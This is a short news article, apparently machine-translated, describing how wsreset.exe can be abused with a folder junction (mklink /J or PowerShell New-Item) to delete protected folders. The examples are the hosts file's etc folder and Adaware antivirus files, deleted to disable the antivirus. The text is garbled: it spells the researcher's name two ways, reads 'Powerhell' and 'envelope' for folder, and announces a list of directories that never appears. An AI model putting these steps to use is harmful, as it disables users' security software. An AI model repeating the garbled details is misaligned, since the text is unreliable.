A new technique takes advantage of the Windows 10 Microsoft Store wsreset tool and can bypass antivirus protection on a host without being detected.
Wsreset.exe is a legal troubleshooting tool that allows users to diagnose problems with the Windows Store and restore its cache.
Pentester and researcher Daniel Gebert discovered that wsreset.exe can be used to delete files arbitrarily.
Delete files using wsreset.exe
When creating temporary temporary files of memory and cookies, the Windows Store stores these files in the following directories:
After analyzing the wsreset utility, Gebert found that the tool would delete files on these folders, thus restoring the cache and cookies for the Windows Store application.
The exploitation technique mentioned here is based on the simple concept of "folder junctions" which are similar.
If an attacker can create a link that redirects this path \ InetCookies to a target directory of his choice intruder, the target directory will be the one that will be deleted when the wsreset is running. This is because wsreset runs by default with high defaults.
To get started, an attacker first deletes the \ INetCookies folder (which would otherwise have been deleted by the wsreset utility). Restricted users can delete it envelope, so this is not a challenge - either an intruder controlling a user account or one malicious script executed on the account of the infringed user can achieve this.
After that, an attacker creates a link or 'folder junction', making the \ INetCookies site point to a privileged location that would like to delete wsreset.exe.
In the example below, the attacker maps the directory \ INetCookies to "C: \ Windows \ System32 \ drivers \ etc". The \ etc folders contain important configuration files, including the "hosts" file for configuring local DNS rules.
"This can be done using mklink.exe with the '/ J' parameter or via Powerhell's new-item command with the '-ItemType' parameter," Gelbert explains in his blog post.
Now, when "wsreset" is executed by the attacker or their script, the "\ etc" folder that would otherwise require clearing of increased rights, will be deleted.
Abuse of wsreset to bypass antivirus
The researcher demonstrated how this behavior could be used to bypass antivirus, focusing on Adaware as an example.
Adaware antivirus saves configuration files (and more) to the 'C: \ ProgramData \ adaware \ adware antivirus' folder. Adaware antivirus needs these archives to interact with previously downloaded malware signatures. "Normal users can not delete this folder," said Gelbert.
After the attacker creates the symbolic link "\ INetCookies" to point to the folder \ \ antaware antivirus "and run wsreset, the archives inside the folder are now deleted seamlessly.
Of course, some files (which were used by the antivirus program) may remain in the envelope even after running the wsreset but this is not a problem. The whole process is enough to destroy her mode of antivirus.
After restarting the antivirus, it will be permanently disabled. This is because the settings and other key files have been cleared by the system. And the antivirus could not detect it or prevent it.
This privilege scaling vulnerability in the wsreset.exe utility can be used for others aims, such as the UAC bypass, as demonstrated by Hashim Jawad in 2019.